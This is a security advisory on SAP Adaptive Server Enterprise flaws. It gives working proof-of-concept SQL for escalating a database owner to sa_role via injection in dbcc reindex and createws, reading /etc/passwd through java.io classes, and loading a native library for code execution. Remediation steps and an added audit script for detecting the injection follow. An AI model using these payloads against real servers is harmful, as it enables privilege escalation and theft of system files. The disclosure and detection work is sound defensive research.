Trustwave SpiderLabs Security Advisory TWSL2015-008:
Multiple Vulnerabilities in SAP Adaptive Server Enterprise

Published: 05/22/15
Version: 1.0

Vendor: SAP (www.sap.com)
Product: SAP Adaptive Server Enterprise (ASE)
Version affected: 15.5, 15.7, 16.0

Product description:
Relational database management system for UNIX, Linux, and Microsoft Windows platforms.


Finding 1: Privilege Escalation Vulnerability (security note 2152278)
Credit: Martin Rakhmanov of Trustwave
CVE: CVE-2014-6285

SAP ASE has an implementation flaw in multiple dbcc commands. Specifically, dbcc reindex is vulnerable to SQL injection. A database owner can exploit this issue to elevate privileges to the system administrator level. In the first example the SQL fragment is planted in an index name stored in sysindexes and carried to the victim in a database dump; dbcc reindex then runs it on the victim server.

Example 1: Privilege escalation via SQL injection in dbcc reindex command (SecMsg ID 713559 2014)

On the attacker-controlled server run:

use master
go
create database mydb
go
exec sp_dboption 'mydb', 'ddl in tran', 'true'
go
use mydb
go
exec sp_reptostandby mydb, 'ALL'
go
use mydb
go
create table mytbl (id int, val varchar(10))
create index s on mytbl(val)
create index idx_mytbl on mytbl(id)
go
sp_configure 'allow updates', 1
go
update sysindexes set status3 = 32, name = 's grant role sa_role to DEMO_LOGIN'
from sysindexes
where id = object_id('mytbl') and indid = 3 and name = 'idx_mytbl'
plan "(update (i_scan csysindexes sysindexes))"
go
sp_configure 'allow updates', 0
go
declare @db_id int, @obj_id int
select @db_id = db_id('mydb'), @obj_id = object_id('mytbl')
dbcc refreshides(@db_id, @obj_id, 3, 'indname')
go
dump database mydb to 'mydb.dump'
go

Then on the victim server load the dump (requires database ownership) and invoke dbcc reindex:

load database mydb from 'mydb.dump'
go
online database mydb
go
use mydb
go
dbcc reindex(mytbl)
go

Example 2: Privilege escalation via SQL injection in dbcc createws command (SecMsg ID 33192 2015)

Here the SQL fragment is passed directly in the segment-name argument, so no dump is needed:

use master
go
create database dbccdb
go
use dbccdb
go
sp_addsegment m, dbccdb, master
go
dbcc createws(dbccdb, 'm grant role sa_role to james', 'b(id int)--', scan, 48)
go


Finding 2: Information Exposure Vulnerability (security note 2152278)
Credit: Martin Rakhmanov of Trustwave
CVE: CVE-2015-3328

Example 1: Filesystem probing via java.io.File class (SecMsg ID 730132 2014)

SAP Adaptive Server Enterprise with the Java subsystem enabled is vulnerable to file probing via the java.io.File class. An attacker can use this to verify whether a path exists and whether it is a file or a directory. With a simple brute-force approach this can be used to reconstruct the file system layout. This vulnerability could be used to mount future attacks against the server's file system.

-- File probing demo for SAP ASE on Windows
--
-- File exists File Is Directory
-- ----------- -----------------
--           1                 1
declare @f java.io.File
set @f = new java.io.File("C:\WINDOWS\")
select @f>>[exists]() as "File exists", @f>>[isDirectory]() as "File Is Directory"
go

Example 2: Filesystem access via java.io.* classes (SecMsg ID 52610 2015)

SAP Adaptive Server Enterprise with the Java subsystem enabled on UNIX and Linux is vulnerable to unauthorized file access via the java.io.RandomAccessFile class and some other java.io.* classes. An attacker can use this to read files outside the $SYBASE directory via SQL queries. This vulnerability could be used to mount future attacks against the server's file system.

-- File reading demo for SAP ASE 16.0 PL02 on Linux
set nocount on
declare @pos int, @body varchar(16384), @ars java.io.RandomAccessFile
select @ars = new java.io.RandomAccessFile("/etc/passwd", "r")
set @pos = @ars>>[length]()
set @body = ''
while (@pos > 0)
begin
    set @body = @body + char(@ars>>[readByte]())
    set @pos = @pos - 1
end
select @body
go


Finding 3: Insecure Library Loading Vulnerability (security note 2155153)
Credit: Martin Rakhmanov of Trustwave
CVE: CVE-2015-3311

SAP Adaptive Server Enterprise with the Java subsystem enabled allows users to load native libraries.
Valid database users can therefore execute arbitrary code in the context of the database server process.

Example 1: Remote Code Execution via Arbitrary Library Loading Vulnerability (SecMsg ID 35157 2015)

declare @s java.lang.System
select @s>>[load]("/export/home/sybase/evil.so")


Remediation Steps:

Apply one of the following vendor-supplied patches:

SAP ASE 16.0 SP01 PL01
SAP ASE 15.7 SP134
SAP ASE Cluster Edition 15.7 SP134

Finding 3 (security note 2155153) additionally requires the configuration change described below. For secure operation of SAP ASE installations with Java functionality enabled, modify the SAP ASE configuration as follows. These instructions disable use of java.io functionality in SAP ASE.

Log in to ASE as a user with sa_role, configure the JRE work and temporary directories, and reboot ASE, e.g.:

% isql -Usa -Pxxxxxx -SMYSERVER
1> use sybpcidb
2> go
1> sp_jreconfig 'disable', 'pca_jvm_work_dir', '/tmp(u+rw)'
2> go
1> sp_jreconfig 'update', 'pca_jvm_tmp_dir', '/tmp', '/dev/null'
2> go
1> sp_jreconfig 'reload'
2> go
1> shutdown
2> go
% RUN_MYSERVER &

(Passing the password with -P exposes it to other local users through the process list; isql prompts for the password when -P is omitted.)


Revision History:

09/23/14 - Finding #1 (SecMsg ID 713559 2014) disclosed to vendor
03/17/15 - Finding #1 (SecMsg ID 33192 2015) disclosed to vendor
09/26/14 - Finding #2 (SecMsg ID 730132 2014) disclosed to vendor
01/15/15 - Finding #2 (SecMsg ID 52610 2015) disclosed to vendor
01/09/15 - Finding #3 (SecMsg ID 35157 2015) disclosed to vendor
05/12/15 - Patch released by vendor
05/22/15 - Advisory published


References:

1. https://websmp230.sap-ag.de/sap/support/notes/2152278
2. https://websmp230.sap-ag.de/sap/support/notes/2155153


About Trustwave:

Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper(R) cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com.

About Trustwave SpiderLabs:

SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs

Disclaimer:

The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
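Added audit script for the three findings above. This is an editor's example, not part of the Trustwave advisory and not a SAP-supplied tool. It assumes an ASE 15.x/16.0 system catalog (sysindexes, sysobjects, syslogins, sysloginroles, syssrvroles), a login holding sa_role, and that sp_jreconfig accepts a 'list' action on your release; the database name mydb and the login name DEMO_LOGIN are the ones used in the Finding 1 proof of concept. It checks a restored database for index names that are not plain identifiers (the carrier for the dbcc reindex injection), lists every login that currently holds sa_role (the result both Finding 1 payloads aim for), and shows whether the Java subsystem and the JRE directory settings from the remediation section are in the expected state.

```sql
-- Added audit script (editor's example; not the advisory's or SAP's code).
-- Assumes an ASE 15.x/16.0 catalog and a session with sa_role.

-- 1. Finding 1: before running dbcc reindex on a database restored from a
--    dump you did not produce, report index names that contain anything
--    other than identifier characters. The PoC stores
--    's grant role sa_role to DEMO_LOGIN' in sysindexes.name, which this
--    query surfaces. Names with spaces or quotes need manual review; a
--    legitimately quoted identifier can also match.
use mydb
go
select o.name as table_name, i.indid, i.name as index_name, i.status3
from sysindexes i, sysobjects o
where i.id = o.id
  and i.indid > 0
  and i.name like '%[^a-zA-Z0-9_#$@]%'
order by o.name, i.indid
go

-- 2. Both Finding 1 payloads end in 'grant role sa_role to <login>'.
--    List every login that holds sa_role so an unexpected grant stands out;
--    DEMO_LOGIN (from the PoC) appearing here is the sign the reindex ran.
use master
go
select l.name as login_name, r.name as role_name
from sysloginroles lr, syslogins l, syssrvroles r
where lr.suid = l.suid
  and lr.srid = r.srid
  and r.name = 'sa_role'
order by l.name
go

-- 3. Findings 2 and 3 require the Java subsystem. Show whether it is
--    enabled, then (assumed 'list' action) dump the sp_jreconfig arguments
--    so pca_jvm_work_dir / pca_jvm_tmp_dir can be compared against the
--    values set in the remediation steps.
sp_configure 'enable java'
go
use sybpcidb
go
sp_jreconfig 'list'
go
```

Run section 1 against every database that was loaded from a dump of external origin, not only mydb, and run it before the first dbcc reindex rather than after. Section 2 is also a useful post-incident check on any server where a database owner could have issued dbcc createws.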